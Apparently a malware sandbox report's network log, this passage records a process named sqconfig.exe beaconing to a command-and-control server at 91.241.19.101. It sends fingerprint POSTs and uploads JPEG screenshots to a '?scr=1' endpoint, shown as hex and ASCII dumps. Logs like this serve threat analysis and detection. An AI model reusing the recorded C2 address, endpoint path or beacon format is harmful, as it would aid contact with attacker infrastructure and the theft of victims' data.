                                                                  Sep 30, 2021 23:53:47.309272051 CEST18291OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:47.309322119 CEST18294OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:47.309561014 CEST18313OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:47.436922073 CEST18316OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:47.437009096 CEST18335OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:47.437052965 CEST18343OUTData Raw: a6 05 37 42 27 95 99 42 4f 13 26 8b 38 a4 35 45 af f1 d0 54 2d 7e e7 a5 76 f2 33 91 50 93 35 3e 5f 5a 43 24 63 a9 ac 66 ba 90 f7 a8 cc ae 7b d3 e4 34 58 77 d4 db 37 51 2f 61 51 b6 a2 ab d3 15 8d 92 7b d1 c9 a3 91 1a 2a 09 1a 6d aa 31 e9 50 3e a1
                                                                  Data Ascii: 7B'BO&85ET-~v3P5>_ZC$cf{4Xw7Q/aQ{*m1P>!TdTCURiUYZ(P0JQ@RR$Z1J\N@4v(-1Q@\j~f_j[pZh_U_KefqO;pkvxgQLAKIKLi(Ei;L.P)h!(
                                                                  Sep 30, 2021 23:53:47.437203884 CEST18361OUTData Raw: 85 25 e0 9f f9 f3 ba ff 00 c0 a6 ac 7d bc 4d 3d 8c 8f 97 a8 af a6 6f 3e 0b f8 2e 0b 2b 89 92 ce e8 b4 71 33 80 6e 5b 19 03 35 e4 df 11 fe 1c 4f e1 1b b6 bc b1 0f 36 93 23 7c ad d4 c4 7f ba df d0 d5 46 ac 64 ec 4c a9 b4 ae 79 fd 29 a4 a2 b5 20 51
                                                                  Data Ascii: %}M=o>.+q3n[5O6#|FdLy) QEQEQE--%/zbShRf4)(!fG4fiPRQGzZJZJ(PQZZJ;&-QLBGz((E&yAKIE0%-- ( bZJ(i);)
                                                                  Sep 30, 2021 23:53:47.634077072 CEST18362INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:47 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  163192.168.2.34999891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:47.518796921 CEST18361OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:47.692944050 CEST18363INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:47 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  164192.168.2.34999991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:47.939014912 CEST18364OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:48.114233017 CEST18377INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  165192.168.2.35000091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:47.986779928 CEST18364OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:47.987042904 CEST18364OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:47.987255096 CEST18374OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:47.987376928 CEST18377OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:48.119484901 CEST18380OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:48.119528055 CEST18383OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:48.119719982 CEST18397OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:48.120502949 CEST18401OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:48.120532036 CEST18403OUTData Raw: 1b b9 5f ba 43 55 77 d1 2f 13 fe 59 67 e9 54 b1 34 de cc 87 82 ad 1d d1 98 bd 71 4f c5 59 6d 3e e1 3a c2 c3 f0 a6 18 64 1d 50 8f c2 ab da 45 ec c5 ec 66 b7 44 60 66 a4 14 6d 22 94 0c d1 72 94 5a 1d 4a 29 31 4e 02 a6 e5 0a 29 d4 80 52 81 52 cb 48
                                                                  Data Ascii: _CUw/YgT4qOYm>:dPEfD`fm"rZJ)1N)RRHP)S@Z|A?.kA?/O?:{?KIid<#a{xV@X9w* ^o""g_03L#1'$9$5utf-Y4QLQ`y |+,|Av
                                                                  Sep 30, 2021 23:53:48.243644953 CEST18413OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:48.243710041 CEST18416OUTData Raw: 2a 9b 69 04 09 3c 20 05 67 42 37 64 ee 63 b4 e4 b1 f5 aa da 46 a5 a4 69 5e 19 d2 f5 66 3a 94 29 67 ae cf 3d a5 b4 7b 25 69 48 86 12 12 49 72 9b 54 f0 09 08 78 27 8a 9f 6c ed 7f eb 57 61 fb 25 7f eb a2 b9 ca ae 8b aa b6 96 75 55 d2 ef 8e 9c 01 26
                                                                  Data Ascii: *i< gB7dcFi^f:)g={%iHIrTx'lWa%uU&[^I'gnSf%aH[V3_n].D%e%p7)Qb:~v'hbe96F<|goN)y+_ok_Gcy4C.Qbb/<#5.
                                                                  Sep 30, 2021 23:53:48.446738958 CEST18451INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  166192.168.2.35000191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:48.343564987 CEST18450OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:48.535842896 CEST18452INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  167192.168.2.35000391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:48.776489019 CEST18453OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:48.941066980 CEST18492INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  168192.168.2.35000291.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:48.780333042 CEST18453OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:48.780632973 CEST18453OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:48.781033993 CEST18463OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:48.781270027 CEST18466OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:48.917326927 CEST18469OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:48.917448044 CEST18472OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:48.917749882 CEST18482OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:48.918179035 CEST18492OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:53:49.054676056 CEST18521OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:49.054785013 CEST18524OUTData Raw: 85 25 e0 9f f9 f3 ba ff 00 c0 a6 ac 7d bc 4d 3d 8c 8f 97 a8 af a6 6f 3e 0b f8 2e 0b 2b 89 92 ce e8 b4 71 33 80 6e 5b 19 03 35 e4 df 11 fe 1c 4f e1 1b b6 bc b1 0f 36 93 23 7c ad d4 c4 7f ba df d0 d5 46 ac 64 ec 4c a9 b4 ae 79 fd 29 a4 a2 b5 20 51
                                                                  Data Ascii: %}M=o>.+q3n[5O6#|FdLy) QEQEQE--%/zbShRf4)(!fG4fiPRQGzZJZJ(PQZZJ;&-QLBGz((E&yAKIE0%-- ( bZJ(i);)
                                                                  Sep 30, 2021 23:53:49.054872990 CEST18532OUTData Raw: 8c ed 20 82 30 32 72 00 19 38 ab 30 f8 46 e2 ea fa ca 1b 6d 4b 4f 9a d6 f1 26 78 ef 90 cb e4 8f 29 0b c8 18 14 0e 08 03 38 d9 ce 46 32 0d 67 52 34 aa 59 cf a6 ab fa f9 15 17 38 df 97 d0 ec f4 4f 8d fa c5 aa f9 3a cd 94 37 f1 b0 c3 4b 09 f2 25 39
                                                                  Data Ascii: 02r80FmKO&x)8F2gR4Y8O:7K%9q?>3_^6b:[f+{;[st,J].W$r3;=SO%V2puO9s<y3k6^YQnwc9W7#oSlo&
                                                                  Sep 30, 2021 23:53:49.268692017 CEST18541INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  169192.168.2.35000491.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:49.179290056 CEST18540OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:49.354995012 CEST18541INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:49 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  17192.168.2.34977691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:54.634196043 CEST7593OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----c9932e640ba65e6431bee773009921f9
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 92984
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:54.634355068 CEST7593OUTData Raw: 2d 2d 2d 2d 2d 2d 63 39 39 33 32 65 36 34 30 62 61 36 35 65 36 34 33 31 62 65 65 37 37 33 30 30 39 39 32 31 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------c9932e640ba65e6431bee773009921f9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:54.634525061 CEST7603OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
